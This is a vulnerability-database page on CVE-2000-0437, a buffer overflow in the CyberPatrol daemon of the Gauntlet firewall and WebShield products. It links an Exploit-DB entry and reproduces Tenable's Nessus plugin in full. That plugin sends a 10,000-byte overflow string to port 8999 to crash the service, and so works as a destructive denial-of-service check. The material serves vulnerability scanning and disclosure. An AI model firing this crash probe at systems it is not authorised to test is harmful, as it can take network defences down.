Vulnerabilities > CVE-2000-0437 - Unspecified vulnerability in Network Associates Gauntlet Firewall, Webshield and Webshield E-Ppliance

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
network-associates
nessus
exploit available

Summary

Buffer overflow in the CyberPatrol daemon "cyberdaemon" used in gauntlet and WebShield allows remote attackers to cause a denial of service or execute arbitrary commands.

Exploit-Db

descriptionGauntlet Firewall 4.1/4.2/5.0,WebShield E-ppliance 100.0/300.0,IRIX 6.5.x Remote Buffer Overflow. CVE-2000-0437 . Remote exploit for irix platform
idEDB-ID:19949
last seen2016-02-02
modified2000-05-18
published2000-05-18
reporter_Gramble_
sourcehttps://www.exploit-db.com/download/19949/
titleGauntlet Firewall 4.1/4.2/5.0,WebShield E-ppliance 100.0/300.0,IRIX 6.5.x - Remote Buffer Overflow

Nessus

NASL familyGain a shell remotely
NASL idGAUNTLET_OVERFLOW.NASL
descriptionThe remote host is running Network Associated Gauntlet firewall. The installed version of the software is vulnerable to a buffer overflow. An attacker could exploit this flaw in order to remotely execute arbitrary commands on the affected host.
last seen2020-06-01
modified2020-06-02
plugin id10420
published2000-05-25
reporterThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10420
titleGauntlet CyberPatrol Content Monitoring System Overflow
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10420);
 script_bugtraq_id(1234);
 script_version ("1.27");
 script_cve_id("CVE-2000-0437");
 
 script_name(english:"Gauntlet CyberPatrol Content Monitoring System Overflow");
 script_summary(english:"Overflow in the Gauntlet product line.");

 script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a buffer overflow." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Network Associated Gauntlet firewall. The
installed version of the software is vulnerable to a buffer overflow.
An attacker could exploit this flaw in order to remotely execute
arbitrary commands on the affected host." );
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f69d6a17" );
 script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/May/254" );
 script_set_attribute(attribute:"solution", value:
"Apply the workaround or patches from the listed references." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");


 script_set_attribute(attribute:"plugin_publication_date", value: "2000/05/25");
 script_set_attribute(attribute:"vuln_publication_date", value: "2000/05/22");
 script_cvs_date("Date: 2018/11/15 20:50:22");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
 script_category(ACT_DESTRUCTIVE_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
 script_family(english:"Gain a shell remotely");
 script_dependencie("find_service1.nasl");
 script_require_ports(8999);
 exit(0);
}


port = 8999;
if (! get_port_state(port)) exit(0, "Port "+port+" is closed.");

  soc = open_sock_tcp(port);
  if(! soc) exit(1, "TCP connection to port "+port+"failed.");

    req = string("10003.http://", crap(10), "\r\n");
    send(socket:soc, data:req);
    r = recv(socket:soc, length:2048);
    close(soc);
    if ( ! r ) exit(0, "No answer from port "+port+".");

    soc = open_sock_tcp(port);
    if ( ! soc ) exit(1, "TCP connection to port "+port+"failed.");
    req = string("10003.http://", crap(10000), "\r\n");
    send(socket:soc, data:req);
    r = recv(socket:soc, length:2048);
    close(soc);
    if(!r)
    {
      security_hole(port);
    }